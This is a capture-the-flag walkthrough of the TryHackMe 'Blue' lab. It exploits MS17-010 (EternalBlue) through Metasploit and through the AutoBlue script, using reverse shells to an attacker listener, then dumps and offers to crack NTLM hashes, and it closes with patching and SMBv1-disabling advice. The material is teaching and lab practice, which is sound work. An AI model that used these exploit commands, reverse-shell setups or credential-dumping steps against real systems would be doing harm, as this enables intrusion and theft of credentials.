Target IP: blue.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User, Root (System) access.

1. Executive Summary

“Blue” is a legacy Windows machine (likely Windows 7 or Server 2008 R2) vulnerable to MS17-010 (EternalBlue). This is a critical buffer overflow vulnerability in the Microsoft Server Message Block (SMBv1) protocol. Exploitation leads directly to NT AUTHORITY\SYSTEM (highest privilege) without requiring valid credentials or user interaction.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap vulnerability scanning (--script smb-vuln-ms17-010).
  • T1210 (Exploitation of Remote Services): Leveraging MS17-010 to execute code via SMB.
  • T1569 (System Services): Creating a malicious service to persist or execute commands.
  • T1003 (OS Credential Dumping): Extracting hashes via hashdump (Post-Exploitation).

2. Operational Setup

Host Configuration

echo "10.10.x.x blue.thm" | sudo tee -a /etc/hosts

Workspace

  • Pane 1: Nmap / Metasploit.
  • Pane 2: Manual Exploit (Optional).

3. Enumeration: “What do we see?”

A. Network Scanning

We scan for open ports and specifically check for SMB vulnerabilities.

nmap -sC -sV --script smb-vuln-ms17-010 -p 139,445 -oA nmap/blue blue.thm

Results:

  • 139/445 (SMB): Windows 7 Professional 7601 Service Pack 1.
  • Vulnerability Check:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

B. Vulnerability Analysis: EternalBlue

What is it? MS17-010 exploits a buffer overflow in the Srv!SrvOs2FeaToNt function in the Windows SMB driver (srv.sys). By sending a specially crafted packet, an attacker can overwrite kernel memory, allowing them to inject shellcode that runs with Kernel privileges.


4. Exploitation: The Metasploit Way (What you did)

This is the “Push Button” method.

  1. Search: search eternalblue or search ms17-010.
  2. Select Module: use exploit/windows/smb/ms17_010_eternalblue.
  • Note: Do not use ms17_010_psexec unless you have credentials. eternalblue is the exploit for unauthenticated access.
  1. Configure:
set RHOSTS blue.thm
set LHOST tun0
set payload windows/x64/meterpreter/reverse_tcp
run
  1. Result: You get a Meterpreter shell as NT AUTHORITY\SYSTEM.

5. Exploitation: The Manual Way (The Professional Way)

Why learn this? If Metasploit is banned (OSCP) or fails, you need this.

A. The Tool: AutoBlue

Clone the AutoBlue repository (a reliable wrapper for the original exploit).

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

B. Shellcode Generation

The exploit needs to know where to send the shell. The script helps generate this shellcode.

./shell_prep.sh
# Enter LHOST: 10.10.x.x
# Enter LPORT: 4444
# Type: 1 (Reverse Meterpreter or regular cmd shell)

This creates a sc_x64.bin.

C. Execution

  1. Listener: Start nc -lvnp 4444.
  2. Exploit:
# python zzz_exploit.py <TARGET_IP> <PIPE_NAME>
python3 zzz_exploit.py 10.10.x.x samr

Note: We often use the samr or browser pipe if we don’t have credentials.

Result: A raw command shell as System.


6. Post-Exploitation

Since we are System, we own the box.

A. Flag Retrieval

  • User Flag: type C:\Users\Jon\Documents\flag1.txt (or similar location).
  • Root Flag: type C:\Windows\System32\config\flag3.txt.

B. Credential Dumping (Hashdump)

In Metasploit:

hashdump

Output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8b57f8cf:::

You can now crack these NTLM hashes using Hashcat (-m 1000) or pass-the-hash.


7. Remediation (Blue Team)

  1. Patch Immediately: Apply Microsoft Security Bulletin MS17-010 (released March 2017).
  2. Disable SMBv1: SMBv1 is insecure and obsolete.
  • PowerShell: Set-SmbServerConfiguration -EnableSMB1Protocol $false
  1. Firewalling: Block port 445 (SMB) from the internet. It should only be accessible over VPN or internal LAN.